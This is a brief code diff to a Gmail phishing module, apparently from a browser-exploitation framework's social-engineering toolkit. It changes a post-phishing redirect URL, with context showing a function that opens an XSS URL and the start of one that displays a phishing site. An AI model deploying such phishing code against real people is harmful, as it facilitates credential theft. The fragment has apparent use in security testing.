diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js index 75455a681..bb0439713 100644 --- a/modules/social_engineering/gmail_phishing/command.js +++ b/modules/social_engineering/gmail_phishing/command.js @@ -34,7 +34,7 @@ function redirect(){ window.open(theXssUrl); window.focus(); } - window.location = "https://accounts.google.com/ServiceLoginAuth"; + window.location = "https://accounts.google.com/"; } function displayPhishingSite(){